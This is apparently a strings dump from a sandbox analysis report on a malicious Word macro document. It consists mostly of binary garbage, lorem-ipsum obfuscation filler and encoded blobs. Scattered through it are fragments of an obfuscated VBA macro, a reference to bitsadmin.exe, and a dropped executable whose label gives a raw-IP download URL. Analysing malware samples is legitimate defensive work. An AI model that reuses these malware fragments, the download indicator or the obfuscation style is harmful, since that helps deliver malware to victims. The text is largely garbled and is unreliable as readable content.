Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPRSTUVWXY[_\]^`HPpOFKSaQqI7YFhceQCeSmvLKAZH95l31x4'*87'234'8&P76'441'0 8'0 2$:'0 4 8'4?',XB.Amet pariatur veniam duis amet occaecat Lorem. 8 0'0bCupidatat quis cillum mollit mollit nisi aliqua quis consequat veniam sint eu quis excepteur nisi.Exercitation eiusmod consectetur minim sit qui nulla aliqua. Voluptate id veniam ut cillum cupidatat mollit reprehenderit ea officia exercitation. 0 4'4<'6pA 0 0'8pAdAliqua cillum aute labore et duis sunt cillum culpa aliquip cupidatat reprehenderit voluptate magna..In irure officia enim qui fugiat cillum dolor. <\: . , 6'. <CLabore enim consequat amet occaecat elit reprehenderit proident consequat Lorem duis. Reprehenderit veniam veniam voluptate in laboris voluptate occaecat esse.-Velit ex nostrud ullamco magna incididunt et.I$@'4AEsse veniam est occaecat adipisicing ipsum Lorem duis id eiusmod. .'$i8](@]XUXpwY1VISnZaM0poYlVSaGRHRmM=+P UXpwY1VISnZaM0poYlVSaGRHRmNOdz09+P,UXpwY1VISnZaM0poYlVSaGRHRmNjV0ZUUW04NFlqST0=+P8UXpwY1VISnZaM0poYlVSaGRHRmNXbTEyVGtSak4wSjFNVzQyUkE9PQ==+P,UXpwY1VISnZaM0poYlVSaGRHRmNRVmRUVW5KUk1sYzU=+P@2rO7rtIruCZY3r0Yr2XrnJzdgdirZ10sy4qYkjIUjBIA4i3xLeGizYkFxJx9VpUYhhF31E1RzbtxSKm92A5Y9fIZDJSKXDHIAswDtHewgnikvc97xaC0Gx7p35AYegGGwzpjh1lDkctOWBtzjNqBUTwUpczuogHoqopQkoGlS58i2RFrcoU5bj0OCfI640cAeW1oYPj06JZfvdBYqsbFIOXBw18I7Z5Enzab79nFB8U4HKRAxRD64byHInBsqWmS2EuraCxLoRnuNJzYxr0G8e7nrcsGhsVAONdHeaxfTpKjcZPix6ET9UiXEnUnUotsKoAE6CpCnnyGq2LN6eDJm3DtYda5zXaOUij8oyfKc4ET1q4vTN0IIG9GiG73XVBU56LZ8lf6AmjDOzNkgg53NVSzVDVmo82hPDGuogOpyHtRUSbzv6eklPKhTCBXsilCWBU0paZ1DuZbgydKbrK8RdlnNsZpORZV4hAdplN0LF2Wn8c0hlGZ4gUrKkIUz63LRQUs4D8lh7OWzjAGfNg4Jn6yrlsdeen820oc0ut1hmGtR5GUXjj8TphHp0Tdq7le'F1WDIX7TWp6wlOLLj1OhkJ2yRSUy7f37V2UynYXYaydsfiEEsHzPJmhCwjYQqWBseZqeHPtexGXrSxDcek05pXPIca7xqEfcajs0GHwSB24uQhFXOz00jmKVt9IbsOpAiGQSuY0vO83Cl44QlxDtpILnx0shnN9czbFGivdyncNK0I4skR2gfz1nHbDy61cSInxoohhoSxuWlS0tzAzdq0eJsh7s7mGTbSaZJH6rdcnKJz4z98XXkZkS7A2LZlj0lB5FCCp3KEVXoq9o69NGhLsJPz8y1nPQCgNx4DbBdC9IeJB7sXYl1OcyYDjZ7HenSfOQJLX6PhzwxDkA1GPCeBVNDbRcCeJVSYDPk9lcsXVZURRjqU5amazDKXOUGAbxzYbCfQYtjKT5n6cR4b45gCnl5xBUbQ0wCfZNPqhO7KtOERY4rtSIFYmzSHXisHOFAwtiL7zb5JviKdrTo0P3kgwq6dhnvL6GfR6kZq74QaF8gFo7T1xVnw5vI4hU00WDGN13ESyPWEiuA2ZwKjZgiRXuCPT7X5AYBlFcgWxvTJyCh2r7SCk'D82'H86'JdOccaecat do enim anim adipisicing in eiusmod anim proident est aliquip reprehenderit dolore commodo. J J'H= H$R'J <\Cillum incididunt irure ut tempor. Nulla Lorem cupidatat mollit aute laboris mollit aliquip. H J'HIOccaecat dolore dolore elit in. Dolore cillum aute labore dolor ea velit. <$P$T$T'@ H J'H H$V'H J J'H H J'H @ X$~&Cillum aliquip anim do consequat quis. H$Z'JGConsectetur elit ad duis anim esse laborum id dolor reprehenderit enim. H$V'JProident proident non consectetur proident proident cupidatat reprehenderit est ut. Irure nulla proident reprehenderit esse dolore aliquip et proident duis. Bo'B B'LIrure dolore quis irure incididunt quis laborum. Ullamco incididunt qui id irure in sunt reprehenderit sint nisi duis ad culpa cupidatat sit.Ea minim anim excepteur cupidatat nostrud esse pariatur quis dolor id quis incididunt occaecat in. Est laborum culpa fugiat qui ad exercitation. H H'JCommodo excepteur enim reprehenderit Lorem eu laboris eu sint cupidatat Lorem dolor incididunt magna. Veniam ipsum aliqua fugiat do.d'B B'Ly F$\'H J$^'J J J'HDolore eu exercitation excepteur ipsum ea commodo proident sunt labore minim magna commodo aute sunt. Commodo quis minim exercitation commodo tempor culpa ex dolore sunt consequat in officia velit.kx < H H'J J J'J[Velit in est adipisicing irure et laborum ut eu do sit non in. Ex fugiat ex velit dolor ad.SMinim adipisicing ad reprehenderit est labore incididunt culpa minim reprehenderit.9Sunt magna incididunt nisi aliquip eu occaecat elit sint. Bh $'L.Magna do qui cupidatat eiusmod amet voluptate.tId non ea commodo ad. Excepteur adipisicing dolor nulla in irure consectetur fugiat magna ad adipisicing ex quis eu. H H'J LA@` H$^'H1Cillum in aute esse nisi commodo ut esse enim id. J$Z'JdhT'BkX B'>iH8]0H`xDDDHHUmkSzvqBVhNzyVCEHIDJ0VSX8bBe8WtTkrD3lW952PXOpDVkCsWgc0m51hEWpD8hsUGS3ocf0ubon8JnpFYXW7CHozvRWIo1KsoX32uapbTF42F52604CO6fIjgVbBb3RZU67fxPbxqioRxQARRKiimZVNCyXtGEBvzJeziUc6IqkDf2VLswAEU3IF7cNEhQWkjqhwFxtXcm5xASKWN46qslcxcGy4bejXnZPBWfnhsSNBexZf1IuvUm1P1n9G8jnC6Ty5EWbHFmG4UCTj4VshkOkTfhcg80rop8OCZdaWrGhqgJH6n23PULvwAKpoKgFSgEJyQ'padmprReQadSVz2VgozjBKtczF3u1j4F1DeaF9wyILLgUcaittlJ0hrCnA1aTiNFkcOdVFkrjJJbNa4QAjensZeoGQWceUK8CXofJ2QJWCVEouBnuA6zZJoT1O3JzIpAX7o9Nu5fROltjYpAx6SYuwAe3ygxQZ5VoqU9q6xG0e3SK35noXan1SuIiTkgncR50xunjzR8YxLCY1YVhLs'f3TcLqKiiStInxYxLdU9PA8KTfBzzx7jiyDmJYdDnHbcGaFnlPBr4zXYRWlfWpjY5j2AUrsvpD13AHhQorKaB77qj190nlWXZL1mryUQEKiHDsE4rn0fpWs2zXm9x9DgBxiRTClwITYxr32awqVb2xvQmkYBLAnuOkDnmZ4fwIUGyuut'l100'h<<<52'n<93'j41'd67'tAv j h'dDeserunt aliquip ipsum reprehenderit occaecat incididunt. Velit mollit reprehenderit veniam reprehenderit ad irure consequat dolor eu non culpa ut et.8Nisi sunt pariatur non et ex eiusmod consequat minim id.=Tempor dolor eiusmod quis velit ullamco ipsum adipisicing ad.AvREnim eiusmod ad ad qui consectetur deserunt ea esse anim tempor pariatur proident. h j'dTRQuis est qui consequat ad. Exercitation elit in officia et qui do mollit occaecat. n'j*Id incididunt enim occaecat reprehenderit. n j'n j d't?Cillum veniam minim tempor non sint do quis dolor enim commodo.3A> n h'tD j$R'j3 t h'dAliquip culpa eu labore proident cupidatat veniam culpa. Nostrud ullamco laboris excepteur veniam culpa labore ut irure do aliqua et.rTVoluptate dolore eu fugiat sunt id velit non in eu Lorem ut voluptate ullamco dolor.DT d$^'n5SPariatur consectetur laborum quis minim cillum dolor proident dolor culpa aute sit.PVelit cupidatat cupidatat aliquip nisi anim occaecat. Nisi in Lorem Lorem dolor.AxProident irure nostrud laborum ullamco dolor. Ex Lorem pariatur eiusmod velit culpa veniam occaecat Lorem Lorem Lorem eiusmod exercitation.D3Et eiusmod occaecat mollit consequat eu voluptate. Qui qui proident ullamco sit id ullamco cupidatat id incididunt incididunt occaecat reprehenderit.DDD t$z'h<Est in eiusmod labore exercitation id ullamco duis sunt pariatur veniam. Id aute esse enim laboris cupidatat occaecat deserunt veniam aliqua nulla est laborum nisi.VOccaecat nisi ipsum qui ullamco consectetur cillum officia occaecat excepteur duis ex.zu$@'t t'nId et Lorem aute eiusmod exercitation exercitation proident laboris ut officia esse non duis. Amet ipsum magna in enim amet quis cillum ea ex veniam sit laborum pariatur mollit. j j'tXReprehenderit est id in minim sunt deserunt minim reprehenderit nulla aliquip nisi sunt. t d'nAdipisicing qui elit eiusmod commodo laboris sunt amet sunt sunt officia ex. Occaecat irure laborum aute eiusmod cillum aute et in pariatur. j$V'tAliquip excepteur ad elit reprehenderit duis labore consectetur duis minim officia labore ut ullamco ex. Consequat sint adipisicing eiusmod aute dolore et proident proident.eIrure nisi adipisicing mollit cupidatat et ullamco nostrud Lorem deserunt anim et veniam consectetur.o

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDFGHIJKLMOPQRSTUVWXYZ[\]^_`abdehijkln0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!"1AQ#23aq$BC 0PRbr%4S`576Dsuv&8@EcTf?/??>?,|D#&In7kG G<o#oWT\}O?_)?`C-o5?F2>k`nphkC+Dd#Ti

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!60!4$*2%> 'Voluptate quis magna do ipsum sunt adexcepteur|lore laborhconsequat|mollit. @Cupida cill`8amet ex fadipisicing.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!`N Prrrpb`<<`d`f`hrrr`jrrr`l`n`p`r,v`i `|`~j^l`jl`jpl`jjl`jl`l l`rl2l,`h`ijli jl`jl`jl`jvl`jl`lbl`jjl`jl`jl`kfl`jl`kxl`jl`jlT`YYIj^li jl`krl`jl`kl`ll`jl`jl`jl`rjl`jl@jl@jl@@@@@@@@@,x`i ````````r

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!G!V+zqTUJk"V`{o7rZq6c!&OHpfG&H0"=`Mpe$sV<Dp8QkbX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!IL-[DRE%PROGRAMFILES%\(x86)\Common Files\Microsoft Shared\OFFICE15\MSO.DLLOffice

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

!z`E_Dmm\&&)$Um^B5-5 TWS:cQ0;Cka%B(B4 bQ)54"+nGR$fBN.9CTl5@U#P

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"!mq'^Q0&2'H

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"#da[OL7Szu+FesdIxeyN3:K;ZVNQ-j7>Ly`WX9F%&52ftEBQ|1]OF,#GCxcD'_VFpU<0owxdY7NcB$eeAJ2zf>XAXG1sWZ>x&\|BX>Zy{A&W><'_x^^)^>~o^?=~>#UkFpDV{csUwu8en Te&D.5VTR\_*t\"m>kC?scCZ+SwcI+",QTKLVsBiR*etpqt:5;O,OqPUe$qEib3,*2.4:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"2\Yox2~+Pl\H1xRax-i4}.*CsP.$l7l_n4+$xpEHsDe,:c[c^t2`,FI!DN@"sr(bkH85[{26nfRB/d##zG/ T|3g-d_[D{8{2S>g]]]Du:?e>nKaEw J0qTQ?x{)@^si|}!o'~^-x87BbMgC6`|8@1o8f'y|k\^gLM("IF,"t:k8ffbq- }3x4(@AywCx$jj,aUC2D6&#|)o174-sL^\Ec,-,9^xb2[bp`".YVkb

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"2VJJ,#5aR)wmz0$'`JOrt2#.'rrVY`wY8+%^_/de/{LrLeDrkA#%Z+56FsRoRDDOh@z%&)|F<TO\&jAa]@%;B38m|B%m+u??7|a%y<

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"@C&Cs Ea.@%vreprehenderullamcoisi814889cEiAf"`"B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"kXy}h:8,Z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"lAV#D8`*KKG@]f5PjiHSd=K

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

"smSNmt$)b*#+.BLQf4Q\KR67/xze~*17=6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

# $i$&Z5gfV RDmc,1\I"sGPc#CG9^'UW=s+B9{UE<Ti{ M594p"9Pd.nryR<h1k);IIVn@N0=QsIe{oppsvfy90CJ2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

#(C9F`sx\CQtMbvF&uEX)hrm9q?G6JZj#CKKDJ*U*m>L2zPj%Yypn32A q,-eitopNgkdCZ/\8<HoUCBlXes-{vXL:Ji.PrL=7;oT *t>,xh>]DlQqqbE#cga,U,i

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

#^Gb2w&_{ju[(D8zcz_:m_dW&K.pctz@N7V.4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

#B}Jz=lx\Qf550*:Hb<y)8j"X7_|~eIexpKA2@oU\\_Qdjx68rEv71]?+{BNvUJH8 k+32,g|ke\q^^j~+!\c_k_x1m,0U*q^jH_Po^!osW]p^\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

#vW=-"+I!cQ)|J4$_Y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

#{A7N93+! [#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$$U4[!w+8MN]j>'IgH%[I\NrLAZm!T9c}RMJzjlKr5aR!WTZvaA %PVcE^taVzi^ZkDP+@(UOv$miI63S

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$(ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzb3456789+/- rg709 711

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$;$+9?:y'?U$7ryK?9*N_=r{XYntq[29(RC-Yp7<X4j#='W7,]5([R.H|'<Y lcv a(3k#xmk'j{fvOnUWGjwsIklc\6<G-$r4<W;@KbFm

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$@d""8BK'6Sy*BEO`jN+L=+lg9Ur.$xA{rVqtM3q< Ucw= @d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$\'j' '/Est aute est mollit fugiat ut ex ut esse culpa. ' ' ' $'Ipsum adipisicing amet duis eiusmod est anim veniam nisi eu nostrud. Et ea elit cillum pariatur amet fugiat sit minim elit ut dolore dolore. '*Incididunt sunt occaecat fugiat mollit do.NIncididunt duis magna est eu ad qui labore ipsum dolore ullamco nisi eu dolor. $' $' ')Cillum officia ea aliquip duis minim qui. ' 'Nulla ut consequat ut ipsum in deserunt culpa velit minim cillum id. Non officia ipsum ad officia ullamco fugiat duis enim Lorem et enim. $' $' 0 $' < $'Voluptate quis magna do ipsum sunt ad sunt excepteur dolore laboris consequat magna mollit. Cupidatat cillum laborum laboris amet ex amet ad adipisicing.Nisi ipsum officia do eiusmod. $' ' @ ?$' 'Ad ut adipisicing culpa aute non occaecat incididunt quis ex ut ad eu. Lorem in laboris ea laborum aute est culpa incididunt quis duis officia laborum dolor nostrud. 'DNulla anim ad culpa ea. Esse enim irure ea Lorem ut magna amet duis.aLorem et occaecat dolore velit et. Sit aliqua fugiat cupidatat sunt aliqua fugiat et tempor aute. ' ' ' ' 'Do Lorem adipisicing duis eu in sint excepteur ipsum eu quis excepteur consequat. Fugiat et aliqua tempor eiusmod esse pariatur consectetur amet tempor exercitation laborum deserunt irure.\Nulla excepteur nulla consequat laborum fugiat nulla do aliquip pariatur commodo eiusmod ex. $'Ti](@Xp^EgZKyNWnCPmGF9QUWtnsjpaO96BrRkRifJicfZzfnL2jBX3A0Vt1r1ZFRzTRSns0V8HpvYYE3F9trjomUzT1djxO1SbWFNg349CvHmoOifF3NCWREkZ85SXR7umpdBgPZKQQXDVh4HQBXxJVUCERoleJRbIBhD6pzX5J2h8eyatF5QzuuK1AnpJv9iw5K5H3gLn7sgC1AooZdIvOOigWbqswUCCC3rKdYdoLDBvhAgtQ8l85AlSfSBHCcII6pbaeICyRVhPZZ3FLQJwePyjiKuXSkj7NZXR8nusLIuK5ufHbQ1dFW80X7VyV8ZXEe0iGHZ0JErHa2pzkI8k8RJLzK7jT2Xeagk'bLNvyNY2cc1ahUXBInXeePR5PxJmPikDpOrmy91d0cAjgBWo3FZ4uhvY4wn2ZQCn3UGKkkjqRc3oIi8fKDhgYSPscXeOdyW2bxJoevWeQyJp1FFC889c3oukDV444yoViRhW4qlHtDpPvOzyczQj4sisuRNBQ7SugnDBGRq0mosvWHfXmegc9RQFygzG6PmHi94Ow3aaUwhsaFcBC7pWR5DVg1lpTX4XIbwNy8Q7XnbH5Vytj41avGbbGrQSHS2qISQmETHf7PxvGJ1ONpaVuffxmqH0S2jjTurEEgUKEjViyOmd8RxCY0WUHPrbAKQjtvVRmoQTCmuh7WKPvP7bhSBIXLUeepgrwoCve0w0mix14HWkd25dDLsHUAoTylma1UtHxxdNEJ78ltQQGgc6a5rxit'ZtfYBoTlYuZ3ZHAOBm67PzsT0dinL7YGdgglueNslcQsir7C6Q5YFeFwN5bCyb20KtHAg4uhVm9WRtT2okJpdIa4uFLmwz2etdfsER0friGemY3lLD5YQB8Ns7RJXxpU0esKKs7qsBXjIFNUNNRb8'97'32'10'21'42'Officia eu id eu cupidatat duis aliquip. Commodo deserunt anim officia excepteur id excepteur enim ut sint ut ut excepteur aliquip voluptate. ' ''xi0Attribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$F?QTLa TjI-F nJaWAz7,zoPr"UZeT7etD*U86%|Z:B0>\"\XW|N6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$jaE56Es>UT$g_+KVrFs&+7<46).GgBz#n"gLa6Q|B)URoW3p1*{XEsLrUVy8[on!!a)Grws6wwJD<ybg0N>lb7+WMbDiBt[GcjdL2& sq0ICooqO7\vfJnkG#938[D&)JFBf3zg^UE

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$O)B6 949Fe.h}H-R=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

$vxN*LtBhNYwt)VeSH%#.^g/LV+xon_(?[vQx~aav:G+|P}ip|U'&4JUxg\:4WZ#vnrKA9v_q)p?kv>?^T+DxZm#ffNv(R0(Es

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%%b%h0'G'n,;uR,9TA@y}UU !"YXlSET)T{DT5

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%<RGM$HrT4HbnvXpyCWl!$xL.TLM6qGA\1+X]MXM> r@VX3$qY*wP#t0M&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%a9Jy}-b5"<^C1y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%bEnb5U'\]N4"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%K\o$(-UqO7L:;'#e 9o1c_v7i[g67f2$I[+JM(Q&#4q]uEer9()kh\23"s^EN&PW-eqlH"#q{TsyLfsvXGxQA{$cJW1^%ZzDY;H{<iQdvC1wa+~Z*0{McFycc|#;"S z/6%X2Gc||dS*wM0o(#vwzqVZh#IB&4r9Qe98WPV2N UXCNzVIm5If#XK4paISVf;2eJ'$OVL_1L&j O*<Usl

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%keAkOVlr"yDv$xgWUV~R&+2TEQpm%\A]' B>a#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

%rd)r_Tp 6e CqUQ:t %p'Ir2)H&Y&Sc-?Y`:bp

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

&4CJffYq[q6.7JU%m^UEgfvV]t$S

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

&e(z!7G|5\EV>8Me-ju4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

&fE_muSZ1vkW*+fF<R+*l BOQ%83M$ !\qzYPZBjZU]/>KRl0GsZTct*=Zj^-iM}e$d#G}6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

&System Info...

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

'!TC2S"]-,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'.L*!s<s<sM=m<<tIEka/p(F(JWuy5Ht7P)H#m1B&}~Gnu}t|I_'~Gnu}t|I_'~Gnu}t|I_'~Gnu"1bdgCg=}3>:>$sO:>:>$sO:>:>$sO:_=;;<pO~:>JQ?^h(@eQ jLe:>$sO:>:>$s>ELuW^8C8[tIE{}#sv]sT^VqOHw+3YX&8Op{49_\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Amet laborum elit irure sint eiusmodnostrud @magna.Doloquis deseruconsequaA

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Amet ptur veniam duis t occ aecatrem.dpvc Cupidyt q!cillum mollitenisi aliquaTonsetsint euexcepte'Ex@ercitaRveiusmod cActeQmin

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Deserunt aliquip ipsum reprehenderit occaecat incididA/. Velmol/venia

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'E,8b&=cteLdea esse atC_proidentQv- g>Quist K@' Exerc`itatiLB3in officiCdo enAAInt(vC)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Es$ncididunt consequat nostrud eiusmod laborum ess@e miniu deserp.Reprehenderitodolore venia;a @cupida siziautectetur}4lDA. DVe fug2iidA

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Ex fugiat`eli t parur eu laboHrisut(magna dolore adipisicing.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'h . AdX{l*cU-4ad

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'I0v(dh sk;WKt"Ud(&6l%$Lyc"G5c=+k4Z0c%bUT-2W2>Kr}R7/1R_D&yJ5;?xdE\by9

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'InrGdo@rgC;ApadTCed>a

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'M.WP81em0vPolup9e

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Noffeiusmod v376987 = Tan(v842208)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'Occaecat do enim adipisicing in eiusmodproident est aliquip reprehenderilore com@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'u}e*wkltFL%.u*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

'V6FePML$$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(&P6[$`f=o0)]W;H5!QVXf

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(8@P>D0xXX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(b8Z@@X4`z(88H"2PP0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Unicode based on Runtime Data (bitsadmin.exe )

(g{`q0cmT+#ZWLhed+XVw}%J}(c$'Vqrr*r;UusCk^|))B2!vDFh8Ks2wWwhAd=8)r?vxtZjF$1NXkz7.J}K\9Cw^(66KA!v5FkT?SS)z/U#UzHUjE]PA

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(hi2lPXz;Ew3W?V?_Nl=dQ|h"#zr(S9T3^=Vw$HP1W/#2L$RrIGR/\-|d3l%!UcJ!UsgnuI

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(kC%. `?Bb `&"-D_nbOC*OECRg#AV$Tee&qdxiRGB(122, 112789#eFix& cA>B ;#[1c<a. AmSmagna0cYa8TfxH#-'YOCR`4R

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(M]SCX;T4o>z[%J(@1A>GR "Q4@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

